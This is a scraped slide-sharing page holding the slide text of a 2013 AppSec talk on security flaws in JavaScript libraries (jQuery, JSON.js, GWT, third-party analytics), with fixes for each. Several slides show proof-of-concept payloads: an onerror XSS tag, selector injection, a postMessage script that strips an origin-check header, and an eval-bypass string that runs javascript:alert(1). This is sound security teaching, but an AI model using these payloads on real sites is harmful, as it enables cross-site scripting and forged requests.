CBDW2014 - MockBox, get ready to mock your socks off!CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!Ortus Solutions, Corp
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
JavaScript 2.0 in Dreamweaver CS4
JavaScript 2.0 in Dreamweaver CS4JavaScript 2.0 in Dreamweaver CS4
JavaScript 2.0 in Dreamweaver CS4alexsaves
 
Scala Frustrations
Scala FrustrationsScala Frustrations
Scala Frustrationstakezoe
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVCAlive Kuo
 
SwampDragon presentation: The Copenhagen Django Meetup Group
SwampDragon presentation: The Copenhagen Django Meetup GroupSwampDragon presentation: The Copenhagen Django Meetup Group
SwampDragon presentation: The Copenhagen Django Meetup GroupErnest Jumbe
 

Ähnlich wie JS Libraries Security Risks (20)

JavaScript Performance Patterns
JavaScript Performance PatternsJavaScript Performance Patterns
JavaScript Performance Patterns
 
JavaScript performance patterns
JavaScript performance patternsJavaScript performance patterns
JavaScript performance patterns
 
Server Side JavaScript - You ain't seen nothing yet
Server Side JavaScript - You ain't seen nothing yetServer Side JavaScript - You ain't seen nothing yet
Server Side JavaScript - You ain't seen nothing yet
 
Node azure
Node azureNode azure
Node azure
 
Testing ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NETTesting ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NET
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Доклад Михаила Егорова на PHDays
Доклад Михаила Егорова на PHDaysДоклад Михаила Егорова на PHDays
Доклад Михаила Егорова на PHDays
 
Testing Ext JS and Sencha Touch
Testing Ext JS and Sencha TouchTesting Ext JS and Sencha Touch
Testing Ext JS and Sencha Touch
 
Java script unit testing
Java script unit testingJava script unit testing
Java script unit testing
 
WebNet Conference 2012 - Designing complex applications using html5 and knock...
WebNet Conference 2012 - Designing complex applications using html5 and knock...WebNet Conference 2012 - Designing complex applications using html5 and knock...
WebNet Conference 2012 - Designing complex applications using html5 and knock...
 
SharePoint and jQuery Essentials
SharePoint and jQuery EssentialsSharePoint and jQuery Essentials
SharePoint and jQuery Essentials
 
Introduction to jQuery
Introduction to jQueryIntroduction to jQuery
Introduction to jQuery
 
jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)
jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)
jQuery Makes Writing JavaScript Fun Again (for HTML5 User Group)
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!CBDW2014 - MockBox, get ready to mock your socks off!
CBDW2014 - MockBox, get ready to mock your socks off!
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
 
JavaScript 2.0 in Dreamweaver CS4
JavaScript 2.0 in Dreamweaver CS4JavaScript 2.0 in Dreamweaver CS4
JavaScript 2.0 in Dreamweaver CS4
 
Scala Frustrations
Scala FrustrationsScala Frustrations
Scala Frustrations
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC
 
SwampDragon presentation: The Copenhagen Django Meetup Group
SwampDragon presentation: The Copenhagen Django Meetup GroupSwampDragon presentation: The Copenhagen Django Meetup Group
SwampDragon presentation: The Copenhagen Django Meetup Group
 

Mehr von drewz lin

Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Via forensics appsecusa-nov-2013
Via forensics appsecusa-nov-2013Via forensics appsecusa-nov-2013
Via forensics appsecusa-nov-2013drewz lin
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Owasp2013 johannesullrich
Owasp2013 johannesullrichOwasp2013 johannesullrich
Owasp2013 johannesullrichdrewz lin
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2drewz lin
 
I mas appsecusa-nov13-v2
I mas appsecusa-nov13-v2I mas appsecusa-nov13-v2
I mas appsecusa-nov13-v2drewz lin
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21drewz lin
 
Appsec usa roberthansen
Appsec usa roberthansenAppsec usa roberthansen
Appsec usa roberthansendrewz lin
 
Appsec2013 presentation-dickson final-with_all_final_edits
Appsec2013 presentation-dickson final-with_all_final_editsAppsec2013 presentation-dickson final-with_all_final_edits
Appsec2013 presentation-dickson final-with_all_final_editsdrewz lin
 
Appsec2013 presentation
Appsec2013 presentationAppsec2013 presentation
Appsec2013 presentationdrewz lin
 
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martinAppsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martindrewz lin
 
Amol scadaowasp
Amol scadaowaspAmol scadaowasp
Amol scadaowaspdrewz lin
 
Agile sdlc-v1.1-owasp-app sec-usa
Agile sdlc-v1.1-owasp-app sec-usaAgile sdlc-v1.1-owasp-app sec-usa
Agile sdlc-v1.1-owasp-app sec-usadrewz lin
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013drewz lin
 
基于虚拟化技术的分布式软件测试框架
基于虚拟化技术的分布式软件测试框架基于虚拟化技术的分布式软件测试框架
基于虚拟化技术的分布式软件测试框架drewz lin
 
新浪微博稳定性经验谈
新浪微博稳定性经验谈新浪微博稳定性经验谈
新浪微博稳定性经验谈drewz lin
 
无线App的性能分析和监控实践 rickyqiu
无线App的性能分析和监控实践 rickyqiu无线App的性能分析和监控实践 rickyqiu
无线App的性能分析和监控实践 rickyqiudrewz lin
 
网易移动自动化测试实践(孔庆云)
网易移动自动化测试实践(孔庆云)网易移动自动化测试实践(孔庆云)
网易移动自动化测试实践(孔庆云)drewz lin
 

Mehr von drewz lin (20)

Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
Via forensics appsecusa-nov-2013
Via forensics appsecusa-nov-2013Via forensics appsecusa-nov-2013
Via forensics appsecusa-nov-2013
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Owasp2013 johannesullrich
Owasp2013 johannesullrichOwasp2013 johannesullrich
Owasp2013 johannesullrich
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
 
I mas appsecusa-nov13-v2
I mas appsecusa-nov13-v2I mas appsecusa-nov13-v2
I mas appsecusa-nov13-v2
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
Chuck willis-owaspbwa-beyond-1.0-app secusa-2013-11-21
 
Appsec usa roberthansen
Appsec usa roberthansenAppsec usa roberthansen
Appsec usa roberthansen
 
Appsec2013 presentation-dickson final-with_all_final_edits
Appsec2013 presentation-dickson final-with_all_final_editsAppsec2013 presentation-dickson final-with_all_final_edits
Appsec2013 presentation-dickson final-with_all_final_edits
 
Appsec2013 presentation
Appsec2013 presentationAppsec2013 presentation
Appsec2013 presentation
 
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martinAppsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martin
 
Amol scadaowasp
Amol scadaowaspAmol scadaowasp
Amol scadaowasp
 
Agile sdlc-v1.1-owasp-app sec-usa
Agile sdlc-v1.1-owasp-app sec-usaAgile sdlc-v1.1-owasp-app sec-usa
Agile sdlc-v1.1-owasp-app sec-usa
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
 
基于虚拟化技术的分布式软件测试框架
基于虚拟化技术的分布式软件测试框架基于虚拟化技术的分布式软件测试框架
基于虚拟化技术的分布式软件测试框架
 
新浪微博稳定性经验谈
新浪微博稳定性经验谈新浪微博稳定性经验谈
新浪微博稳定性经验谈
 
无线App的性能分析和监控实践 rickyqiu
无线App的性能分析和监控实践 rickyqiu无线App的性能分析和监控实践 rickyqiu
无线App的性能分析和监控实践 rickyqiu
 
网易移动自动化测试实践(孔庆云)
网易移动自动化测试实践(孔庆云)网易移动自动化测试实践(孔庆云)
网易移动自动化测试实践(孔庆云)
 

Kürzlich hochgeladen

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 

Kürzlich hochgeladen (20)

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 

JS Libraries Security Risks

  • 1. JS Libraries Insecurity Appsec USA 2013 Stefano di Paola CTO @ Minded Security stefano.dipaola@mindedsecurity.com
  • 2. /me whois • Research – OWASP-Italy Senior Member – Testing Guide Contributor – OWASP SWFIntruder – DOMinator (JavaScript Runtime Taint Engine) – Bug Hunter & Sec Research (Pdf Uxss, Flash Security, HPP) – Security Since '99 • Work – CTO @ Minded Security Application Security Consulting – Director of Minded Security Research Labs – Blog: http://blog.mindedsecurity.com – Twitter: @wisecwisec
  • 4. About this talk • A wrap up of some interesting JS snippets • Reckless use of common libraries and third party scripts • Some unwitting one as well • Comes after 2.5 years developing/using DOMinator and DOMinatorPro
  • 5. JQuery() is a Sink(?) • What's a Sink in Application Security? “..a function or method that can be considered unsecure when one of its arguments come from an untrusted input and is not correctly validated according to the layer the function is going to communicate to.“ • C's strcpy is a sink. strcpy(dst,src) • Java's jdbc.executeQuery is a sink executeQuery('select * from t where id='+str) • JQuery.html is a sink (and no one complains)
  • 6. JQuery() more than a Sink • JQuery is More than a Sink! • Other sinks do only one thing. JQuery was designed to perform different operations based on the argument type and content. ● http://api.jquery.com/jQuery/
  • 7. JQuery() more than a Sink • JQuery was written with flexibility in mind • But introduced a design issue that could be called a 'developer trust boundary violation'. – The principal use is for selecting elements (trusted) – ...and 'onload' callback execution(trusted) – The least one used is the actual sink method: jQuery( html [, ownerDocument ] ) Enough Words! Show Me The Code
  • 8. JQuery() Concerns History • http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html http://bugs.jquery.com/ticket/9521 «XSS with $(location.hash) and $(#<tag>) is needed?» ("fixed" (?)) • http://bugs.jquery.com/ticket/11773 « jQuery needs HTML escaping functionality » (undecided) • From reddit's jquery-migrate-is-sink-too: http://www.reddit.com/r/programming/comments/1cqno2/ «.. geocar - This is one of my biggest gripes about jQuery: Using the same interface for query and executing is a Bad Idea, that is, $ ("<script>alert(69)</script>") simply shouldn't do anything at all. ..» Actually doesn't but he got the point..) -> $("<img src='dd' onerror='alert(1)'>")
  • 9. JQuery() as a Selector? • Might be considered as a potentially dangerous method ? – depends on how its results are further used. • It's more than querySelectorAll because there are features like: $("div:contains(" + word + ")") What if: word=),div[id=secret]:contains(cycleForDataExtr).. • If the results will affect something that is observable by an attacker, then we got a problem!
  • 10. JQuery() Solution • JQuery Users: – Never Use jQuery() or $() with an unvalidated argument – No matter which version you are using! – Read the whole documentation, please! – And since the doc is never really complete, take some time to read the code! • JQuery Developers, please: – remove old versions (zip them all for reference) – Plan to change the jQuery do-everything behaviour to a dosimply-one-thing behavior.
  • 11. JQuery.Ajax → HPP • $.ajax json(p) allows three ways to create a callback parameter: a. Explicit Callback Parameter in the url b. Explicit Callback Parameter in the object c. Callback Placeholder in the url $.ajax({url:"//host/index.html", data: "kwrds=ss&cb=test", //{cb:'test', kwrds: 'ss' } dataType:'jsonp', cache:true, success:function(){} }) $.ajax({url: '//host/index.html?kwrds=ss', jsonp: "cb", dataType: "jsonp", success: function() { } }) $.ajax({url: '//host/?kwrds=ss&cb=?', dataType: "jsonp", success: function() { } })
  • 12. JQuery.Ajax Priority map • If there's HPP we can force the callback in the following cases: a(url) b(object) c(placehld) a(url) a c+'&'+a a+c b(object) b+'&'+a b c c(placehld) a+c c c Enough Words! Show Me The Code
  • 13. JQuery.Ajax Solution • Be sure you're not allowing Client side HPP by: – Encoding tainted values with encodeURIComponent (remember it may trigger exception) try{ kw= encodeURIComponent(location.hash.slice(1)) url = 'kwrds='+kw $.ajax({ url: url, jsonp:'callback', …. }) }catch(e){ /*stop execution..blahblah*/ }
  • 14. JQuery.html(RegEx pd) • Devs often use $.html() with untrusted input. • Sometimes they validate that using wrong regexps patterns. http://go.imgsmail.ru/js/unity.js?1308 h = /</?(.+?)/?>/ig; w.striptags = function(a, b) { var c = Array.isArray(b) ? b : null; return a.replace(h, c ? function(a, b) { return c.contains(b) ? a : "" } : "") }; • Fixed with: /</?([sS]+?)/?>/gi
  • 15. JQuery.html(RegEx pd) • ..Or they unfortunately don't work as expected... http://ots.optimize.webtrends.com/ots/lib/3.2/wt_lib.js ... var test = z7696.location.search; } catch (z392c) { z82c5 = document; } ….. var z43ac = (zbea6.length - 1); var z33f9 = {}; for (var z205e = 0; z205e <= z43ac; z205e++) { var z6b05 = zbea6[z205e].split("="); z6b05[0] = unescape(z6b05[0]); z6b05[1] = unescape(z6b05[1]); z6b05[0] = z6b05[0].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/+/g, " "); z6b05[1] = z6b05[1].replace(/<.*?>/g, ""); z33f9[z6b05[0]] = z6b05[1]; ….
  • 16. JQuery.html(RegEx pd) • ..Or they fortunately don't work as expected... var evil=false; var p1=/[";'<>@(){}!$^*-+|~`]/; // Regexp 4 special chars var p2=/(javascripts*:)|(alert)|/; // Regexp against XSS var url = location.href; if(url.match(p1) && url.match(p2)) // Fortunately Wrong!! evil=true; if(evil==false) div.innerHTML = url Enough Words! Show Me the Stuff!
  • 18. JQuery.html(RegEx pd) solution Test those f#@#g RegExps!!! … OR NOT (if you are damn lucky!) Tip: If you're not a RegEx guru give a try to: http://www.debuggex.com
  • 19. JQuery.ajax(Proxifyme) • Client Request Proxy – Feature of MS's LyncWeb – https://vi.ct.im/XXX/XFrame/XFrame.html – Yes, it's framable by design window.onmessage = function(e) { var requestInput = JSON.parse(e.data); var request = buildRequest(requestInput, e.source, e.origin); $.ajax(request); } – Let's have a look at the code!
  • 20. JQuery.ajax(Proxifyme) • Attacker might just try to ask politely.. frame.location= "https://xxx/Autodiscover/XFrame/XFrame.html" var ob={ url:"/" } frame.postMessage(JSON.stringify(ob),"*") The code adds this unfriendly header: X-Ms-Origin: http://at.tack.er ..and the server unbelievably checks it! And returns 403.
  • 21. JQuery.ajax(Proxifyme) • Attacker now asks less politely.. frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", headers:{'X-Ms.Origin':'https://vi.ct.im'} } frame.postMessage(JSON.stringify(ob),"*") aaand... X-Ms-Origin: http://at.tack.er No success! Returns 403.
  • 22. JQuery.ajax(Proxifyme) • Attacker now is a bit frustrated but wait...read the jQ doc! var ob={ accepts:, // cache:, // contentType:, // Whatever data:, // "p1=v1&p2=v2.." headers:, An object of additional header key/value pairs to send along with requests using the XMLHttpRequest transport. The header X-Requested-With: XMLHttpRequest is always added. but its default XMLHttpRequest value can be changed here. Values in the headers setting can also be overwritten from within the beforeSend function. (version added: 1.5) processData:, // urlencode or not. type, // GET , POST HEAD BLAH url, // Url. xhrFields:, //XMLHttpRequest.attr = val messageId: //Internal }
  • 23. JQuery.ajax(Proxifyme) • Attacker now is less frustrated he can try something more: frame.location= "https://vi.ct.im/XXX/XFrame/XFrame.html" var ob={ url:"/", XhrFields:{setRequestHeader:void} } frame.postMessage(JSON.stringify(ob),"*") aand ciao ciao custom headers! • .. but there's more..
  • 24. JQuery.ajax(Proxifyme) • Why does it work? Why doesn't it break the code? // Need an extra try/catch for cross domain requests in Firefox 3 try { for ( i in headers ) { xhr.setRequestHeader( i, headers[ i ] ); } }catch( _ ) {} We can actually add custom headers and block the X-MsOrigin!
  • 25. JSON.js (OBG) • http://www.ietf.org/rfc/rfc4627.txt Security considerations (D. Crockford): «Generally there are security issues with scripting languages. JSON is a subset of JavaScript, but it is a safe subset that excludes assignment and invocation. A JSON text can be safely passed into JavaScript's eval() function (which compiles and executes a string) if all the characters not enclosed in strings are in the set of characters that form JSON tokens. This can be quickly determined in JavaScript with two regular expressions and calls to the test and replace methods. var my_JSON_object = !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test( text.replace(/"(.|[^"])*"/g, ''))) && eval('(' + text + ')'); Interoperability considerations: n/a Published specification: RFC 4627»
  • 26. JSON.js (OBG) • Old JSON.js implementation: function jsonParse(string, secure) { if (secure && !/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/.test( string.replace(/./g, "@"). replace(/"[^"nr]*"/g, "")) ){ return null; } return eval("(" + string + ")"); } http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html
  • 27. JSON.js (OBG) • parseJSON('a') is considered valid even if it's not JSON → a is actually eval'ed! • Eaeflnr-u part with no quotes let's you do this. • Next step is to see if there some standard object in window that matches the JSON regexp. for(var aa in window) if( aa.match(/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/)) console.log(""+aa) Results in: self status http://blog.mindedsecurity.com/2011/08/ye-olde-crockford-json-regexp-is.html
  • 28. JSON.js (OBG) • Still there's a lot of problems since () = cannot be used! • But on IE...: // Courtesy of Eduardo `sirdarckcat` Vela Nava +{ "valueOf": self["location"], "toString": []["join"], 0: "javascript:alert(1)", length: 1 } is seen as valid JSON and
  • 30. JSON.js (OBG) • '' Ok ok but it's old stuff...right? ''
  • 31. JSON.js (OBG) • '' Ok ok but it's old stuff...right? ''
  • 33. GWT's JSON safeToEval http://code.google.com/p/google-webtoolkit/source/browse/trunk/user/src/com/google/gwt/core/client/JsonUtils.java#78 /**    * Returns true if the given JSON string may be safely evaluated by {@code    * eval()} without undersired side effects or security risks. Note that a true    * result from this method does not guarantee that the input string is valid    * JSON.  This method does not consider the contents of quoted strings; it    * may still be necessary to perform escaping prior to evaluation for correct    * results.    *    * <p> The technique used is taken from <a href="http://www.ietf.org/rfc/rfc4627.txt">RFC 4627</a>.    */   public static native boolean safeToEval(String text) /*-{     // Remove quoted strings and disallow anything except:     //     // 1) symbols and brackets ,:{}[]     // 2) numbers: digits 0-9, ., -, +, e, and E     // 3) literal values: 'null', 'true' and 'false' = [aeflnr-u]     // 4) whitespace: ' ', 'n', 'r', and 't'     return !(/[^,:{}[]0-9.-+Eaeflnr-u nrt]/.test(text.replace(/"(.|[^"])*"/g, '')));   }-*/;  
  • 34. JSON.js Solution • The new json.js uses a brand new regexp which "should" be safe • Or use json_parse.js which doesn't use eval. • ..or better use native methods JSON.parse / JSON.stringify if you can! • Finally, remember that after parsing you still have an unvalidated object! {"html":"<img src='s'onerror='XSSHere'>"}
  • 35. 3rd party services give 3rd party surprises • Omniture, Web Trends, Google Ads... • Several issues found and fixed • Web Trends is a web analytics service. • DEBUG version based on parameters → HTML Injection? http://www.microsoft.com/en-us/default.aspx? aaaa=11111111&gclid=1111&=&_wt.debug=2222&_wt.mode=preview&toJSON=4444&normal=9999&staging=a aaa&preview=bbbb&none=cccc&#bbbbb=2222222&%3Cs%3Essss (They know about it) + actually this requires popup blocker disabled Enough Words! Show Me The Code
  • 36. 3rd party services solution • Test and audit all the 3rd party libraries / js! • Do it periodically if they are external resources
  • 37. Credentials in URL • http://user:pass@host.com/ • What can possibly go wrong with those? • Chrome is the last browser that transparently allows them • They are shown it to all location object
